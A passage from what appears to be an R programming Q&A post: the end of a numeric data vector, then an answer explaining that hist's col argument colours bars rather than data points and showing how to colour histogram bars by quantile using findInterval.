33, 33, 89, 89, 63, 63, 18, 18, 25, 25, 36, 36, 108, 108, 3,
3, 52, 52, 83, 83, 74, 74, 56, 56, 99, 99, 6, 6, 25, 25, 51,
51, 4, 4, 100, 100, 17, 17, 44, 44, 23, 23, 70, 70, 85, 85, 14,
14, 22, 22, 89, 89, 45, 45, 2, 2, 29, 29, 14, 14, 69, 69, 96,
96, 10, 10, 58, 58, 97, 97, 54, 54, 60, 60, 65, 65, 2, 2, 54,
54, 4, 4, 28, 28, 107, 107, 74, 74, 72, 72, 71, 71, 42, 42, 92,
92, 64, 64, 39, 39, 111, 111, 72, 72, 73, 73, 58, 58, 41, 41,
56, 56, 73, 73, 18, 18, 73, 73, 36, 36, 60, 60, 49, 49, 47, 47,
95, 95, 19, 19, 8, 8, 7, 7, 38, 38, 38, 38, 38, 38, 28, 28, 79,
79, 53, 53, 30, 30, 19, 19, 14, 14, 53, 53, 68, 68, 39, 39, 42,
42, 87, 87, 33, 33, 18, 18, 77, 77, 83, 83, 19, 19, 14, 14, 7,
7, 32, 32, 94, 94, 30, 30, 55, 55, 89, 89, 30, 30, 45, 45, 84,
84, 38, 38, 59, 59, 73, 73, 77, 77, 22, 22, 55, 55, 31, 31, 52,
52, 20, 20, 26, 26, 62, 62, 55, 55, 46, 46, 26, 26, 49, 49, 22,
22, 65, 65, 67, 67, 73, 73, 29, 29, 88, 88, 86, 86, 76, 76, 32,
32, 12, 12, 19, 19, 14, 14, 8, 8, 63, 63, 63, 63, 65, 65, 84,
84, 34, 34, 42, 42, 26, 26, 75, 75, 68, 68, 28, 28, 95, 95, 17,
17, 76, 76, 33, 33, 91, 91, 93, 93, 80, 80, 89, 89, 64, 64, 81,
81, 98, 98, 47, 47, 70, 70, 46, 46, 11, 11, 92, 92, 69, 69, 95,
95, 51, 51, 87, 87, 61, 61, 50, 50, 47, 47, 35, 35, 31, 31, 39,
39, 19, 19, 81, 81, 35, 35, 68, 68, 68, 68, 67, 67, 57, 57, 7,
7, 9, 9, 23, 23, 50, 50, 89, 89, 41, 41, 54, 54, 53, 53, 57,
57, 89, 89, 32, 32, 40, 40, 48, 48, 35, 35, 15, 15, 90, 90, 1,
1, 17, 17, 53, 53, 73, 73, 76, 76, 59, 59, 45, 45, 68, 68, 21,
21, 37, 37, 33, 33, 51, 51, 61, 61, 31, 31, 15, 15, 23, 23, 29,
29, 45, 45, 96, 96, 87, 87, 37, 37, 104, 104, 50, 50, 58, 58,
103, 103, 91, 91, 72, 72, 73, 73, 27, 27, 60, 60, 23, 23, 99,
99, 28, 28, 78, 78, 27, 27, 82, 82, 63, 63, 34, 34, 84, 84, 62,
62, 2, 2, 99, 99, 22, 22, 85, 85, 39, 39, 47, 47, 66, 66, 17,
17, 74, 74, 45, 45, 70, 70, 87, 87, 28, 28, 97, 97, 89, 89, 33,
33, 50, 50, 79, 79, 86, 86, 69, 69, 91, 91, 75, 75, 52, 52, 76,
76, 13, 13, 71, 71, 42, 42, 20, 20, 28, 28, 56, 56, 69, 69, 16,
16, 47, 47, 60, 60, 45, 45, 72, 72, 78, 78, 107, 107, 4, 4, 64,
64, 88, 88, 9, 9, 3, 3, 10, 10, 92, 92, 41, 41, 5, 5, 35, 35,
31, 31, 24, 24, 70, 70, 47, 47, 41, 41, 32, 32, 92, 92, 90, 90,
75, 75, 3, 3, 78, 78, 30, 30, 93, 93, 60, 60, 17, 17, 25, 25,
48, 48, 70, 70, 69, 69, 66, 66, 76, 76, 104, 104, 31, 31, 72,
72, 56, 56, 64, 64, 92, 92, 68, 68, 102, 102, 100, 100, 27, 27,
40, 40, 47, 47, 29, 29, 76, 76, 78, 78, 20, 20, 13, 13, 10, 10,
113, 113, 17, 17, 61, 61, 69, 69, 65, 65, 16, 16, 100, 100, 5,
5, 18, 18, 24, 24, 54, 54, 41, 41, 64, 64, 66, 66, 90, 90, 29,
29, 97, 97, 37, 37, 42, 42, 84, 84, 37, 37, 74, 74, 65, 65, 12,
12, 49, 49, 31, 31, 108, 108, 9, 9, 93, 93, 71, 71, 39, 39, 70,
70, 79, 79, 92, 92, 60, 60, 104, 104, 79, 79, 103, 103, 38, 38,
93, 93, 46, 46, 66, 66, 79, 79, 51, 51, 31, 31, 65, 65, 93, 93,
25, 25, 22, 22, 91, 91, 123, 123, 51, 51, 34, 34, 64, 64, 31,
31, 24, 24, 74, 74, 57, 57, 95, 95, 83, 83, 28, 28, 56, 56, 72,
72, 43, 43, 18, 18, 66, 66, 32, 32, 17, 17, 67, 67, 10, 10, 44,
44, 66, 66, 57, 57, 89, 89, 57, 57, 55, 55, 18, 18, 78, 78, 82,
82, 103, 103, 110, 110, 92, 92, 54, 54, 35, 35, 8, 8, 53, 53,
86, 86, 45, 45, 99, 99, 19, 19, 84, 84, 94, 94, 92, 92, 80, 80,
69, 69, 45, 45, 22, 22, 59, 59, 9, 9, 41, 41, 72, 72, 24, 24,
117, 117, 79, 79, 57, 57, 29, 29, 96, 96, 47, 47, 23, 23, 64,
64, 33, 33, 48, 48, 80, 80, 30, 30, 42, 42, 10, 10, 42, 42, 68,
68, 46, 46, 58, 58, 39, 39, 82, 82, 79, 79, 80, 80, 89, 89, 85,
85, 24, 24, 106, 106, 40, 40, 90, 90, 69, 69, 92, 92, 84, 84,
82, 82, 86, 86, 80, 80, 73, 73, 78, 78, 39, 39, 27, 27, 55, 55,
100, 100, 63, 63, 21, 21, 46, 46, 94, 94, 6, 6, 45, 45, 66, 66,
94, 94, 52, 52, 78, 78, 59, 59, 86, 86, 67, 67, 76, 76, 54, 54,
47, 47, 37, 37, 76, 76, 32, 32, 49, 49, 87, 87, 122, 122, 27,
27, 82, 82, 51, 51, 50, 50, 22, 22, 32, 32, 99, 99, 77, 77, 54,
54, 29, 29, 82, 82, 80, 80, 85, 85, 30, 30, 57, 57, 41, 41, 50,
50, 65, 65, 51, 51, 109, 109, 89, 89, 50, 50, 6, 6, 66, 66, 42,
42, 48, 48, 88, 88, 67, 67, 89, 89, 109, 109, 80, 80, 64, 64,
64, 64, 95, 95, 76, 76, 76, 76, 78, 78, 44, 44, 51, 51, 19, 19,
29, 29, 31, 31, 75, 75, 11, 11, 10, 10, 64, 64, 80, 80, 29, 29,
73, 73, 67, 67, 38, 38, 27, 27, 23, 23, 74, 74, 79, 79, 49, 49,
78, 78, 29, 29, 59, 59, 70, 70, 8, 8, 24, 24, 39, 39, 80, 80,
27, 27, 29, 29, 36, 36, 94, 94, 86, 86, 35, 35, 84, 84, 99, 99,
83, 83, 92, 92, 81, 81, 58, 58, 2, 2, 64, 64, 75, 75, 29, 29,
53, 53, 58, 58, 11, 11, 38, 38, 83, 83, 108, 108, 86, 86, 56,
56, 12, 12, 84, 84, 76, 76, 38, 38, 54, 54, 37, 37, 27, 27, 61,
61, 83, 83, 37, 37, 59, 59, 81, 81, 76, 76, 70, 70, 61, 61, 101,
101, 77, 77, 68, 68, 74, 74, 83, 83, 70, 70, 93, 93, 53, 53,
64, 64, 89, 89, 1, 1, 53, 53, 67, 67, 81, 81, 71, 71, 51, 51,
85, 85, 35, 35, 67, 67, 53, 53, 37, 37, 31, 31, 65, 65, 82, 82,
47, 47, 60, 60, 81, 81, 21, 21, 94, 94, 75, 75, 92, 92, 113,
113, 93, 93, 84, 84, 77, 77, 82, 82, 84, 84, 58, 58, 83, 83,
84, 84, 80, 80, 1, 1, 49, 49, 73, 73, 22, 22, 99, 99, 74, 74,
28, 28, 33, 33, 74, 74, 91, 91, 83, 83, 70, 70, 99, 99, 69, 69,
38, 38, 68, 68, 47, 47, 61, 61, 47, 47, 70, 70, 85, 85, 20, 20,
100, 100, 3, 3, 49, 49, 100, 100, 85, 85, 54, 54, 8, 8, 3, 3,
47, 47, 46, 46, 45, 45, 27, 27, 87, 87, 20, 20, 24, 24, 51, 51,
50, 50, 105, 105, 73, 73, 13, 13, 18, 18, 51, 51, 75, 75, 55,
55, 62, 62, 85, 85, 56, 56, 51, 51, 66, 66, 74, 74, 63, 63, 2,
2, 81, 81, 85, 85, 19, 19, 16, 16, 83, 83, 36, 36, 79, 79, 63,
63, 41, 41, 45, 45, 76, 76, 62, 62, 67, 67, 74, 74, 92, 92, 47,
47, 41, 41, 80, 80, 57, 57, 100, 100, 66, 66, 58, 58, 65, 65,
59, 59, 20, 20, 54, 54, 10, 10, 79, 79, 64, 64, 106, 106, 44,
44, 28, 28, 41, 41, 49, 49, 80, 80, 61, 61, 20, 20, 75, 75, 59,
59, 93, 93, 32, 32, 38, 38, 30, 30, 41, 41, 8, 8, 8, 8, 54, 54,
56, 56, 83, 83, 81, 81, 77, 77, 42, 42, 59, 59, 11, 11, 21, 21,
77, 77, 84, 84, 86, 86, 84, 84, 34, 34, 48, 48, 80, 80, 92, 92,
18, 18, 66, 66, 40, 40, 45, 45, 60, 60, 80, 80, 2, 2, 5, 5, 84,
84, 66, 66, 70, 70, 70, 70, 95, 95, 62, 62, 0, 0, 67, 67, 61,
61, 71, 71, 73, 73, 82, 82, 45, 45, 54, 54, 43, 43)

It is because you mistunderstand the col argument of hist.
The col argument is a vector where col[i] is the colour of the ith bar of the histogram.
Your k vector has one element per element of x, which is many more than the number of bars in the histogram.
In the first case, only the first 13 elements of k are used to colour the bars (in that order), since there are only 13 bars. In the second case, the first n elements of k are used to colour the bars, where n is the number of bars (see how the first 13 bars of the small-bin histogram have the same colour as the first 13 of the first histogram?).
If you want to colour the bars by quantile, you will have to work out how many bars are in each quantile (not how many data points), and create your k like that.
To do this, you need to know the histogram breaks - the breakpoints of your bins. The output of hist returns an object where you can get the breakpoints and so on - see ?hist.
# do the histogram counts to get the break points
# don't plot yet
h <- hist(x, breaks=20, plot=F) # h$breaks and h$mids
To work out the colour the bar should be, you can use either the starting coordinate of each bar (all but the last element of h$breaks), the ending coordinate of each bar (all but the first element of h$breaks) or the midpoint coordinate of each bar (h$mids). Set your colours like you did above.
The findInterval(h$mids, quantile(x), ...) works out which quantile each bar is in (determined by the bar's midpoint); it returns an integer with which interval it is in, or 0 if it's outside (though by definition every bar of the histogram is between the 0th and 100th quantile, so technically your "grey" colour is not ever used). rightmost.closed makes sure the 100% quantile value is included in the top-most colour bracket. The cols[findInterval(...)+1] is just a cool/tricksy way to do your ifelse(h$mids <= ..., "$8DD3C7", ifelse(h$mids <= ..., .....)); you could do it the ifelse way if you prefer.
cols <- c('grey', "#8DD3C7", "#FFFFB3", "#BEBADA", "#FB8072")
k <- cols[findInterval(h$mids, quantile(x), rightmost.closed=T, all.inside=F) + 1]
# plot the histogram with the colours
plot(h, col=k)
Have a look at k - it is only as long as the number of bars in the histogram, rather than as long as the number of datapoints in x.